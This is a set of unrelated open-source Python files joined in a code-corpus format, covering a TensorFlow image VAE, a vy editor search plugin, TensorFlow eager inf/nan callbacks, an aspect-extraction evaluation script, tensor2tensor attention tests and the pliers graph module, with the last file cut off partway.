def visual_encoder(self, inputs, clss, hparams, train):
del train
# goes from [batch, 64, 64, 1] to [batch, hidden_size]
with tf.variable_scope('visual_encoder', reuse=tf.AUTO_REUSE):
ret = inputs
clss = tf.reshape(clss, [-1])
# conv layer, followed by instance norm + FiLM
ret = tf.layers.Conv2D(hparams.base_depth, 5, 1,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2D(hparams.base_depth, 5, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2D(2 * hparams.base_depth, 5, 1,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2D(2 * hparams.base_depth, 5, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
# new conv layer, to bring shape down
ret = tf.layers.Conv2D(2 * hparams.bottleneck_bits, 4, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
# new conv layer, to bring shape down
ret = tf.layers.Conv2D(2 * hparams.bottleneck_bits, 4, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
# ret has 1024
ret = tf.layers.flatten(ret)
ret = tf.layers.dense(ret, 2 * hparams.bottleneck_bits, activation=None)
return ret
def visual_decoder(self, bottleneck, clss, hparams):
# goes from [batch, bottleneck_bits] to [batch, 64, 64, 1]
with tf.variable_scope('visual_decoder', reuse=tf.AUTO_REUSE):
# unbottleneck
ret = tf.layers.dense(bottleneck, 1024, activation=None)
ret = tf.reshape(ret, [-1, 4, 4, 64])
clss = tf.reshape(clss, [-1])
# new deconv to bring shape up
ret = tf.layers.Conv2DTranspose(2 * hparams.base_depth, 4, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
# new deconv to bring shape up
ret = tf.layers.Conv2DTranspose(2 * hparams.base_depth, 4, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(2 * hparams.base_depth, 5, padding='SAME',
activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(2 * hparams.base_depth, 5, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(hparams.base_depth, 5, padding='SAME',
activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(hparams.base_depth, 5, 2, padding='SAME',
activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(hparams.base_depth, 5, padding='SAME',
activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2D(1, 5, padding='SAME', activation=None)(ret)
ret = tfd.Independent(tfd.Bernoulli(logits=ret),
reinterpreted_batch_ndims=3,
name='image')
return ret
@registry.register_hparams
def image_vae():
"""Basic Image VAE model hparams."""
hparams = common_hparams.basic_params1()
hparams.daisy_chain_variables = False
hparams.batch_size = 64
hparams.hidden_size = 32
hparams.initializer = 'uniform_unit_scaling'
hparams.initializer_gain = 1.0
hparams.weight_decay = 0.0
# VAE hparams
hparams.add_hparam('base_depth', 32)
hparams.add_hparam('bottleneck_bits', 32)
# loss hparams
hparams.add_hparam('kl_beta', 300)
hparams.add_hparam('free_bits_div', 4)
hparams.add_hparam('free_bits', 0.15)
# data format hparams
hparams.add_hparam('num_categories', 62)
# problem hparams (required, don't modify)
hparams.add_hparam('absolute', False)
hparams.add_hparam('just_render', True)
hparams.add_hparam('plus_render', False)
return hparams
|
vyapp/plugins/fstmt.py | iogf/vy | 927 | 12739165 | <gh_stars>100-1000
"""
Overview
========
Find where patterns are found, this plugin uses silver searcher to search
for word patterns. It is useful to find where functions/methods
are used over multiple files.
Key-Commands
============
Namespace: fstmt
Mode: NORMAL
Event: <Control-z>
Description: Same as <Key-bar> but matches insensitively.
Mode: NORMAL
Event: <Key-z>
Description: Open the previous found pattern occurrences.
Mode: NORMAL
Event: <Key-Z>
Description: Get the string under the cursor and perform
a case sensitive and resursive search in the current project file directory.
It grabs the string under the cursor only if there is no selected text.
The search is performed in the current project folder, if fstmt cant find a .git, svn
nor .hg it performs the search in the vy HOME directory.
"""
from subprocess import Popen, STDOUT, PIPE
from vyapp.widgets import LinePicker
from vyapp.areavi import AreaVi
from re import findall, escape
from vyapp.stderr import printd
from vyapp.app import root
class Fstmt:
options = LinePicker()
path = 'ag'
def __init__(self, area):
self.area = area
area.install('fstmt',
('NORMAL', '<Key-z>', lambda event: self.options.display()),
('NORMAL', '<Control-z>', lambda event: self.picker('-i')),
('NORMAL', '<Key-Z>', lambda event: self.picker('-s')))
@classmethod
def c_path(cls, path='ag'):
cls.path = path
printd('Fstmt - Setting ag path = ', path)
def catch_pattern(self):
pattern = self.area.join_ranges('sel')
pattern = pattern if pattern else self.area.get(
*self.area.get_word_range())
pattern = escape(pattern)
return pattern
def make_cmd(self, pattern, dir, *args):
cmd = [Fstmt.path, '--nocolor', '--nogroup',
'--vimgrep', '--noheading']
cmd.extend(args)
cmd.extend([pattern, dir])
return cmd
def run_cmd(self, pattern, *args):
dir = self.area.project
dir = dir if dir else AreaVi.HOME
dir = dir if dir else self.area.filename
child = Popen(self.make_cmd(pattern, dir, *args), stdout=PIPE,
stderr=STDOUT, encoding=self.area.charset)
regex = '(.+):([0-9]+):[0-9]+:(.+)'
ranges = findall(regex, child.communicate()[0])
if ranges:
self.options(ranges)
else:
root.status.set_msg('No pattern found!')
def picker(self, *args):
pattern = self.catch_pattern()
if not pattern:
root.status.set_msg('No pattern set!')
else:
self.run_cmd(pattern, *args)
|
tensorflow/python/eager/execution_callbacks.py | ryorda/tensorflow-viennacl | 522 | 12739187 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Execution Callbacks for Eager Mode."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.platform import tf_logging as logging
_DEFAULT_CALLBACK_ACTION = "raise"
_VALID_CALLBACK_ACTIONS = (None, "ignore", "print", "raise", "warn")
# TODO(cais): Consider moving this exception class to errors_impl.py.
class InfOrNanError(Exception):
"""Exception for inf and/or nan being present in tensor."""
def __init__(self,
op_type,
op_name,
output_index,
num_outputs,
value):
"""Constructor of InfOrNanError.
Args:
op_type: Type name of the op that generated the tensor that generated the
`inf`(s) or `nan`(s) (e.g., `Div`).
op_name: Name of the op that generated the tensor with `inf`(s) or
`nan`(s). This name is set by client and can be `None` if it is unset.
output_index: The 0-based output index of the tensor that contains
`inf`(s) or `nan`(s).
num_outputs: Total number of outputs of the operation.
value: The tensor value that contains `inf`(s) or `nan`(s).
"""
self._op_type = op_type
self._op_name = op_name
self._output_index = output_index
self._num_outputs = num_outputs
self._value = value
self._total_count = np.size(value)
self._inf_count = np.count_nonzero(np.isinf(value))
self._nan_count = np.count_nonzero(np.isnan(value))
super(InfOrNanError, self).__init__(self._get_error_message())
def _get_error_message(self):
"""Get the error message describing this InfOrNanError object."""
name_str = (("'%s'" % self._op_name) if self._op_name is not None
else str(self._op_name))
msg = "Output %d of %d of TFE operation %s (name: %s) contains " % (
self._output_index + 1, self._num_outputs, self._op_type, name_str)
if self._inf_count and self._nan_count:
msg += "%d inf(s) and %d nan(s) " % (self._inf_count, self._nan_count)
elif self._inf_count:
msg += "%d inf(s) " % self._inf_count
else:
msg += "%d nan(s) " % self._nan_count
msg += "out of a total of %d element(s). Tensor value: %s" % (
self._total_count, self._value)
return msg
@property
def op_type(self):
return self._op_type
@property
def op_name(self):
return self._op_name
@property
def output_index(self):
return self._output_index
@property
def num_outputs(self):
return self._num_outputs
@property
def value(self):
return self._value
def inf_nan_callback(op_type,
op_name,
attrs,
inputs,
outputs,
check_inf=True,
check_nan=True,
action=_DEFAULT_CALLBACK_ACTION):
"""An execution callback that checks for `inf`s and `nan`s in output tensors.
This callback can be used with `tfe.add_execute_callback` to check for invalid
numeric values. E.g.,
```python
tfe.add_execute_callback(tfe.inf_nan_callback)
```
Args:
op_type: Name of the TFE operation type (e.g., `MatMul`).
op_name: Name of the TFE operation. This name is set by client and can be
`None` if it unset.
attrs: Attributes of the TFE operation, as a tuple of alternating attribute
names and attribute values.
inputs: The `list` of input tensors to the operation, currently unused by
this callback.
outputs: The `list` of output tensors from the operation, checked by this
callback for `inf` and `nan` values.
check_inf: (`bool`) Whether this callback should check for `inf` values in
the output tensor values.
check_nan: (`bool`) Whether this callback should check for `nan` values in
the output tensor values.
action: (`str`) Action to be taken by the callback when `inf` or `nan`
values are detected. Possible values {"raise", "warn", "print"}
`"raise"`: Raise a `InfOrNanError`.
`"warn"`: Log a warning using `tf.logging.warn`.
`"print"`: Print a message to `sys.stdout`.
Raises:
InfOrNanError: iff `inf` or `nan` values are seen in any of `outputs` and
`action` is `"raise"`.
ValueError: iff the value of `action` is invalid.
"""
del attrs, inputs # Not used.
ctx = context.get_default_context()
for index, output in enumerate(outputs):
if not output.dtype.is_numpy_compatible:
continue
numpy_dtype = output.dtype.as_numpy_dtype
if (np.issubdtype(numpy_dtype, np.float) or
np.issubdtype(numpy_dtype, np.complex) or
np.issubdtype(numpy_dtype, np.integer)):
try:
check_numerics_op_attrs = (
"message", "Eager-mode inf/nan check",
"T", outputs[0].dtype.as_datatype_enum)
# TODO(cais): Consider moving this into execute.py.
# pylint: disable=protected-access
pywrap_tensorflow.TFE_Py_Execute(
ctx._handle, output.device, "CheckNumerics", [output],
check_numerics_op_attrs, 1)
# pylint: enable=protected-access
except core._NotOkStatusException: # pylint: disable=protected-access
value = output.numpy()
inf_detected = np.any(np.isinf(value)) and check_inf
nan_detected = np.any(np.isnan(value)) and check_nan
if not inf_detected and not nan_detected:
continue
error = InfOrNanError(op_type, op_name, index, len(outputs), value)
if action == "print":
print("Warning: %s" % str(error))
elif action == "warn":
logging.warn(str(error))
elif action == "raise":
raise error
else:
raise ValueError(
"Invalid action for inf_nan_callback: %s. Valid actions are: "
"{print | warn | raise}" % action)
def inf_callback(op_type,
op_name,
attrs,
inputs,
outputs,
action=_DEFAULT_CALLBACK_ACTION):
"""A specialization of `inf_nan_callback` that checks for `inf`s only."""
inf_nan_callback(
op_type, op_name, attrs, inputs, outputs, check_inf=True, check_nan=False,
action=action)
def nan_callback(op_type,
op_name,
attrs,
inputs,
outputs,
action=_DEFAULT_CALLBACK_ACTION):
"""A specialization of `inf_nan_callback` that checks for `nan`s only."""
inf_nan_callback(
op_type, op_name, attrs, inputs, outputs, check_inf=False, check_nan=True,
action=action)
def add_execution_callback(callback):
"""Add an execution callback to the default eager context.
An execution callback is invoked immediately after an eager operation or
function has finished execution, providing access to the op's type, name
input and output tensors. Multiple execution callbacks can be added, in
which case the callbacks will be invoked in the order in which they are
added. To clear all execution callbacks that have been added, use
`clear_execution_callbacks()`.
Example:
```python
def print_even_callback(op_type, op_name, attrs, inputs, outputs):
# A callback that prints only the even output values.
if outputs[0].numpy() % 2 == 0:
print("Even output from %s: %s" % (op_name or op_type, outputs))
tfe.add_execution_callback(print_even_callback)
x = tf.pow(2.0, 3.0) - 3.0
y = tf.multiply(x, tf.add(1.0, 5.0))
# When the line above is run, you will see all intermediate outputs that are
# even numbers printed to the console.
tfe.clear_execution_callbacks()
```
Args:
callback: a callable of the signature
`f(op_type, op_name, attrs, inputs, outputs)`.
`op_type` is the type of the operation that was just executed (e.g.,
`MatMul`).
`op_name` is the name of the operation that has was just executed. This
name is set by the client who created the operation and can be `None` if
it is unset.
`attrs` contains the attributes of the operation as a `tuple` of
alternating attribute name and attribute value.
`inputs` is the `list` of input `Tensor`(s) to the op.
`outputs` is the `list` of output `Tensor`(s) from the op.
Return value(s) from the callback are ignored.
"""
context.get_default_context().add_post_execution_callback(callback)
def clear_execution_callbacks():
"""Clear all execution callbacks from the default eager context."""
context.get_default_context().clear_post_execution_callbacks()
def seterr(inf_or_nan=None):
"""Set how abnormal conditions are handled by the default eager context.
Example:
```python
tfe.seterr(inf_or_nan="raise")
a = tf.constant(10.0)
b = tf.constant(0.0)
try:
c = a / b # <-- Raises InfOrNanError.
except Exception as e:
print("Caught Exception: %s" % e)
tfe.seterr(inf_or_nan="ignore")
c = a / b # <-- Does NOT raise exception anymore.
```
Args:
inf_or_nan: Set action for infinity (`inf`) and NaN (`nan`) values.
Possible values: `{"ignore", "print", "raise", "warn"}`.
`"ignore"`: take no action when `inf` values appear.
`"print"`: print a warning to `stdout`.
`"raise"`: raise an `InfOrNanError`.
`"warn"`: print a warning using `tf.logging.warn`.
A value of `None` leads to no change in the action of the condition.
Returns:
A dictionary of old actions.
Raises:
ValueError: If the value of any keyword arguments is invalid.
"""
if inf_or_nan not in _VALID_CALLBACK_ACTIONS:
raise ValueError(
"Invalid action value for inf_or_nan: %s. "
"Valid actions are %s." % (inf_or_nan, _VALID_CALLBACK_ACTIONS))
old_settings = {"inf_or_nan": "ignore"}
default_context = context.get_default_context()
carryover_callbacks = []
for callback in default_context.post_execution_callbacks:
# Check whether the callback is inf_nan_callback or a partial object of
# inf_nan_callback.
if (callback == inf_nan_callback or
isinstance(callback, functools.partial) and
callback.func == inf_nan_callback):
if callback == inf_nan_callback:
old_settings["inf_or_nan"] = _DEFAULT_CALLBACK_ACTION
else:
old_settings["inf_or_nan"] = callback.keywords.get(
"action", _DEFAULT_CALLBACK_ACTION)
elif inf_or_nan is not None:
carryover_callbacks.append(callback)
if inf_or_nan is not None:
default_context.clear_post_execution_callbacks()
for callback in carryover_callbacks:
default_context.add_post_execution_callback(callback)
if inf_or_nan != "ignore":
default_context.add_post_execution_callback(
functools.partial(inf_nan_callback, action=inf_or_nan))
return old_settings
|
code/evaluation.py | saurabhgupta17888/Unsupervised-Aspect-Extraction | 338 | 12739189 | import argparse
import logging
import numpy as np
from time import time
import utils as U
from sklearn.metrics import classification_report
import codecs
######### Get hyper-params in order to rebuild the model architecture ###########
# The hyper parameters should be exactly the same as those used for training
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--out-dir", dest="out_dir_path", type=str, metavar='<str>', required=True, help="The path to the output directory")
parser.add_argument("-e", "--embdim", dest="emb_dim", type=int, metavar='<int>', default=200, help="Embeddings dimension (default=200)")
parser.add_argument("-b", "--batch-size", dest="batch_size", type=int, metavar='<int>', default=50, help="Batch size (default=50)")
parser.add_argument("-v", "--vocab-size", dest="vocab_size", type=int, metavar='<int>', default=9000, help="Vocab size. '0' means no limit (default=9000)")
parser.add_argument("-as", "--aspect-size", dest="aspect_size", type=int, metavar='<int>', default=14, help="The number of aspects specified by users (default=14)")
parser.add_argument("--emb", dest="emb_path", type=str, metavar='<str>', help="The path to the word embeddings file")
parser.add_argument("--epochs", dest="epochs", type=int, metavar='<int>', default=15, help="Number of epochs (default=15)")
parser.add_argument("-n", "--neg-size", dest="neg_size", type=int, metavar='<int>', default=20, help="Number of negative instances (default=20)")
parser.add_argument("--maxlen", dest="maxlen", type=int, metavar='<int>', default=0, help="Maximum allowed number of words during training. '0' means no limit (default=0)")
parser.add_argument("--seed", dest="seed", type=int, metavar='<int>', default=1234, help="Random seed (default=1234)")
parser.add_argument("-a", "--algorithm", dest="algorithm", type=str, metavar='<str>', default='adam', help="Optimization algorithm (rmsprop|sgd|adagrad|adadelta|adam|adamax) (default=adam)")
parser.add_argument("--domain", dest="domain", type=str, metavar='<str>', default='restaurant', help="domain of the corpus {restaurant, beer}")
parser.add_argument("--ortho-reg", dest="ortho_reg", type=float, metavar='<float>', default=0.1, help="The weight of orthogonol regularizaiton (default=0.1)")
args = parser.parse_args()
out_dir = args.out_dir_path + '/' + args.domain
# out_dir = '../pre_trained_model/' + args.domain
U.print_args(args)
assert args.algorithm in {'rmsprop', 'sgd', 'adagrad', 'adadelta', 'adam', 'adamax'}
assert args.domain in {'restaurant', 'beer'}
from keras.preprocessing import sequence
import reader as dataset
###### Get test data #############
vocab, train_x, test_x, overall_maxlen = dataset.get_data(args.domain, vocab_size=args.vocab_size, maxlen=args.maxlen)
test_x = sequence.pad_sequences(test_x, maxlen=overall_maxlen)
############# Build model architecture, same as the model used for training #########
from model import create_model
import keras.backend as K
from optimizers import get_optimizer
optimizer = get_optimizer(args)
def max_margin_loss(y_true, y_pred):
return K.mean(y_pred)
model = create_model(args, overall_maxlen, vocab)
## Load the save model parameters
model.load_weights(out_dir+'/model_param')
model.compile(optimizer=optimizer, loss=max_margin_loss, metrics=[max_margin_loss])
################ Evaluation ####################################
def evaluation(true, predict, domain):
true_label = []
predict_label = []
if domain == 'restaurant':
for line in predict:
predict_label.append(line.strip())
for line in true:
true_label.append(line.strip())
print(classification_report(true_label, predict_label,
['Food', 'Staff', 'Ambience', 'Anecdotes', 'Price', 'Miscellaneous'], digits=3))
else:
for line in predict:
label = line.strip()
if label == 'smell' or label == 'taste':
label = 'taste+smell'
predict_label.append(label)
for line in true:
label = line.strip()
if label == 'smell' or label == 'taste':
label = 'taste+smell'
true_label.append(label)
print(classification_report(true_label, predict_label,
['feel', 'taste+smell', 'look', 'overall', 'None'], digits=3))
def prediction(test_labels, aspect_probs, cluster_map, domain):
label_ids = np.argsort(aspect_probs, axis=1)[:,-1]
predict_labels = [cluster_map[label_id] for label_id in label_ids]
evaluation(open(test_labels), predict_labels, domain)
## Create a dictionary that map word index to word
vocab_inv = {}
for w, ind in vocab.items():
vocab_inv[ind] = w
test_fn = K.function([model.get_layer('sentence_input').input, K.learning_phase()],
[model.get_layer('att_weights').output, model.get_layer('p_t').output])
att_weights, aspect_probs = test_fn([test_x, 0])
## Save attention weights on test sentences into a file
att_out = codecs.open(out_dir + '/att_weights', 'w', 'utf-8')
print 'Saving attention weights on test sentences...'
for c in xrange(len(test_x)):
att_out.write('----------------------------------------\n')
att_out.write(str(c) + '\n')
word_inds = [i for i in test_x[c] if i!=0]
line_len = len(word_inds)
weights = att_weights[c]
weights = weights[(overall_maxlen-line_len):]
words = [vocab_inv[i] for i in word_inds]
att_out.write(' '.join(words) + '\n')
for j in range(len(words)):
att_out.write(words[j] + ' '+str(round(weights[j], 3)) + '\n')
######################################################
# Uncomment the below part for F scores
######################################################
## cluster_map need to be specified manually according to the top words in each inferred aspect (save in aspect.log)
# map for the pre-trained restaurant model (under pre_trained_model/restaurant)
# cluster_map = {0: 'Food', 1: 'Miscellaneous', 2: 'Miscellaneous', 3: 'Food',
# 4: 'Miscellaneous', 5: 'Food', 6:'Price', 7: 'Miscellaneous', 8: 'Staff',
# 9: 'Food', 10: 'Food', 11: 'Anecdotes',
# 12: 'Ambience', 13: 'Staff'}
# print '--- Results on %s domain ---' % (args.domain)
# test_labels = '../preprocessed_data/%s/test_label.txt' % (args.domain)
# prediction(test_labels, aspect_probs, cluster_map, domain=args.domain)
|
tensor2tensor/layers/common_image_attention_test.py | jaseweir/tensor2tensor | 12,921 | 12739244 | # coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for common image attention utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import common_image_attention
from tensor2tensor.utils import hparam
import tensorflow.compat.v1 as tf
class CommonImageAttentionTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters(
(common_image_attention.DistributionType.DMOL, 5, 50),
(common_image_attention.DistributionType.CAT, None, 256),
)
def testPostProcessImageTrainMode(self, likelihood, num_mixtures, depth):
batch = 1
rows = 8
cols = 24
hparams = hparam.HParams(
hidden_size=2,
likelihood=likelihood,
mode=tf.estimator.ModeKeys.TRAIN,
num_mixtures=num_mixtures,
)
inputs = tf.random_uniform([batch, rows, cols, hparams.hidden_size],
minval=-1., maxval=1.)
outputs = common_image_attention.postprocess_image(
inputs, rows, cols, hparams)
self.assertEqual(outputs.shape, (batch, rows, cols, depth))
@parameterized.parameters(
(common_image_attention.DistributionType.DMOL, 5, 50),
(common_image_attention.DistributionType.CAT, None, 256),
)
def testPostProcessImageInferMode(self, likelihood, num_mixtures, depth):
batch = 1
rows = 8
cols = 24
block_length = 4
block_width = 2
hparams = hparam.HParams(
block_raster_scan=True,
hidden_size=2,
likelihood=likelihood,
mode=tf.estimator.ModeKeys.PREDICT,
num_mixtures=num_mixtures,
query_shape=[block_length, block_width],
)
inputs = tf.random_uniform([batch, rows, cols, hparams.hidden_size],
minval=-1., maxval=1.)
outputs = common_image_attention.postprocess_image(
inputs, rows, cols, hparams)
num_blocks_rows = rows // block_length
num_blocks_cols = cols // block_width
self.assertEqual(outputs.shape,
(batch, num_blocks_rows, num_blocks_cols,
block_length, block_width, depth))
@parameterized.parameters(
(common_image_attention.DistributionType.DMOL, 5, 50),
(common_image_attention.DistributionType.CAT, None, 256),
)
def testCreateOutputTrainMode(self, likelihood, num_mixtures, depth):
batch = 1
height = 8
width = 8
channels = 3
rows = height
if likelihood == common_image_attention.DistributionType.CAT:
cols = channels * width
else:
cols = width
hparams = hparam.HParams(
hidden_size=2,
likelihood=likelihood,
num_channels=channels,
mode=tf.estimator.ModeKeys.TRAIN,
num_mixtures=num_mixtures,
)
decoder_output = tf.random_normal([batch, rows, cols, hparams.hidden_size])
targets = tf.random_uniform([batch, height, width, channels],
minval=-1., maxval=1.)
output = common_image_attention.create_output(
decoder_output, rows, cols, targets, hparams)
if hparams.likelihood == common_image_attention.DistributionType.CAT:
self.assertEqual(output.shape, (batch, height, width, channels, depth))
else:
self.assertEqual(output.shape, (batch, height, width, depth))
def testTransformerDecoderLayersGlobal(self):
one_hot_data = tf.constant([[[0., 1.], [1., 0.]],
[[0., 1.], [1., 0.]],
[[1., 0.], [1., 0.]]])
hparams = common_hparams.basic_params1()
hparams.hidden_size = 4
hparams.num_layers = 1
hparams.layer_prepostprocess_dropout = 0.
hparams.add_hparam("attention_key_channels", None)
hparams.add_hparam("attention_value_channels", None)
hparams.add_hparam("num_heads", 1)
hparams.add_hparam("attention_dropout", 0.)
hparams.add_hparam("shared_rel", False)
hparams.add_hparam("block_width", 1)
hparams.add_hparam("block_length", 1)
hparams.add_hparam("q_filter_width", 1)
hparams.add_hparam("kv_filter_width", 1)
hparams.add_hparam("filter_size", 16)
hparams.add_hparam("ffn_layer", "conv_hidden_relu")
hparams.add_hparam("relu_dropout", 0.)
conv_1d = tf.keras.layers.Conv1D(filters=hparams.hidden_size,
kernel_size=1,
use_bias=False)
shifted_data = tf.pad(one_hot_data, [[0, 0], [1, 0], [0, 0]])[..., :-1, :]
net = conv_1d(shifted_data)
output = common_image_attention.transformer_decoder_layers(
inputs=net,
encoder_output=None,
num_layers=hparams.num_layers,
hparams=hparams,
self_attention_bias=common_image_attention.get_self_attention_bias(net),
attention_type=common_image_attention.AttentionType.GLOBAL)
self.evaluate(tf.global_variables_initializer())
output_val = self.evaluate(output)
# The outputs for the padded dimension should be equal across all data.
self.assertAllEqual(output_val[0, 0], output_val[1, 0])
self.assertAllEqual(output_val[1, 0], output_val[2, 0])
# The first and second elements of the batch are identical, so they should
# have the same outputs for the second latent dimension as well.
self.assertAllEqual(output_val[0, 1], output_val[1, 1])
if __name__ == "__main__":
tf.test.main()
|
pliers/graph.py | nickduran/pliers | 229 | 12739262 | <gh_stars>100-1000
''' The `graph` module contains tools for constructing and executing graphs
of pliers Transformers. '''
from itertools import chain
from collections import OrderedDict
import json
from pliers.extractors.base import merge_results
from pliers.stimuli import __all__ as stim_list
from pliers.transformers import get_transformer
from pliers.utils import (listify, flatten, isgenerator, attempt_to_import,
verify_dependencies)
pgv = attempt_to_import('pygraphviz', 'pgv')
stim_list.insert(0, 'ExtractorResult')
class Node:
''' A graph node/vertex. Represents a single transformer, optionally with
references to children.
Args:
name (str): Name of the node
transformer (Transformer): the Transformer instance at this node
parameters (kwargs): parameters for initializing the Transformer
'''
def __init__(self, transformer, name=None, **parameters):
self.name = name
self.children = []
if isinstance(transformer, str):
transformer = get_transformer(transformer, **parameters)
self.transformer = transformer
self.parameters = parameters
if name is not None:
self.transformer.name = name
self.id = id(transformer)
def add_child(self, node):
''' Append a child to the list of children. '''
self.children.append(node)
def is_leaf(self):
return len(self.children) == 0
def to_json(self):
spec = {'transformer': self.transformer.__class__.__name__}
if self.name:
spec['name'] = self.name
if self.children:
children = []
for c in self.children:
children.append(c.to_json())
spec['children'] = children
if self.parameters:
spec['parameters'] = self.parameters
return spec
class Graph:
''' Graph-like structure that represents an entire pliers workflow.
Args:
nodes (list, dict): Optional nodes to add to the Graph at construction.
If a dict, must have a 'roots' key. If a list, each element must be
in one of the forms accepted by add_nodes().
spec (str): An optional path to a .json file containing the graph
specification.
'''
def __init__(self, nodes=None, spec=None):
self.nodes = OrderedDict()
self.roots = []
if nodes is not None:
if isinstance(nodes, dict):
nodes = nodes['roots']
self.add_nodes(nodes)
elif spec is not None:
with open(spec) as spec_file:
self.add_nodes(json.load(spec_file)['roots'])
@staticmethod
def _parse_node_args(node):
if isinstance(node, dict):
return node
kwargs = {}
if isinstance(node, (list, tuple)):
kwargs['transformer'] = node[0]
if len(node) > 1:
kwargs['children'] = node[1]
if len(node) > 2:
kwargs['name'] = node[2]
elif isinstance(node, Node):
kwargs['transformer'] = node.transformer
kwargs['children'] = node.children
kwargs['name'] = node.name
else:
kwargs['transformer'] = node
return kwargs
def add_nodes(self, nodes, parent=None, mode='horizontal'):
''' Adds one or more nodes to the current graph.
Args:
nodes (list): A list of nodes to add. Each element must be one of
the following:
* A dict containing keyword args to pass onto to the Node init.
* An iterable containing 1 - 3 elements. The first element is
mandatory, and specifies the Transformer at that node. The
second element (optional) is an iterable of child nodes
(specified in the same format). The third element
(optional) is a string giving the (unique) name of the
node.
* A Node instance.
* A Transformer instance.
parent (Node): Optional parent node (i.e., the node containing the
pliers Transformer from which the to-be-created nodes receive
their inputs).
mode (str): Indicates the direction with which to add the new nodes
* horizontal: the nodes should each be added as a child of the
'parent' argument (or a Graph root by default).
* vertical: the nodes should each be added in sequence with
the first node being the child of the 'parnet' argument
(a Graph root by default) and each subsequent node being
the child of the previous node in the list.
'''
for n in nodes:
node_args = self._parse_node_args(n)
if mode == 'horizontal':
self.add_node(parent=parent, **node_args)
elif mode == 'vertical':
parent = self.add_node(parent=parent, return_node=True,
**node_args)
else:
raise ValueError("Invalid mode for adding nodes to a graph:"
"%s" % mode)
def add_chain(self, nodes, parent=None):
''' An alias for add_nodes with the mode preset to 'vertical'. '''
self.add_nodes(nodes, parent, 'vertical')
def add_children(self, nodes, parent=None):
''' An alias for add_nodes with the mode preset to 'horizontal'. '''
self.add_nodes(nodes, parent, 'horizontal')
def add_node(self, transformer, name=None, children=None, parent=None,
parameters={}, return_node=False):
''' Adds a node to the current graph.
Args:
transformer (str, Transformer): The pliers Transformer to use at
the to-be-added node. Either a case-insensitive string giving
the name of a Transformer class, or an initialized Transformer
instance.
name (str): Optional name to give this Node.
children (list): Optional list of child nodes (i.e., nodes to pass
the to-be-added node's Transformer output to).
parent (Node): Optional node from which the to-be-added Node
receives its input.
parameters (dict): Optional keyword arguments to pass onto the
Transformer initialized at this Node if a string is passed to
the 'transformer' argument. Ignored if an already-initialized
Transformer is passed.
return_node (bool): If True, returns the initialized Node instance.
Returns:
The initialized Node instance if return_node is True,
None otherwise.
'''
node = Node(transformer, name, **parameters)
self.nodes[node.id] = node
if parent is None:
self.roots.append(node)
else:
parent = self.nodes[parent.id]
parent.add_child(node)
if children is not None:
self.add_nodes(children, parent=node)
if return_node:
return node
def run(self, stim, merge=True, **merge_kwargs):
''' Executes the graph by calling all Transformers in sequence.
Args:
stim (str, Stim, list): One or more valid inputs to any
Transformer's 'transform' call.
merge (bool): If True, all results are merged into a single pandas
DataFrame before being returned. If False, a list of
ExtractorResult objects is returned (one per Extractor/Stim
combination).
merge_kwargs: Optional keyword arguments to pass onto the
merge_results() call.
'''
results = list(chain(*[self.run_node(n, stim) for n in self.roots]))
results = list(flatten(results))
self._results = results # For use in plotting
return merge_results(results, **merge_kwargs) if merge else results
transform = run
def run_node(self, node, stim):
''' Executes the Transformer at a specific node.
Args:
node (str, Node): If a string, the name of the Node in the current
Graph. Otherwise the Node instance to execute.
stim (str, stim, list): Any valid input to the Transformer stored
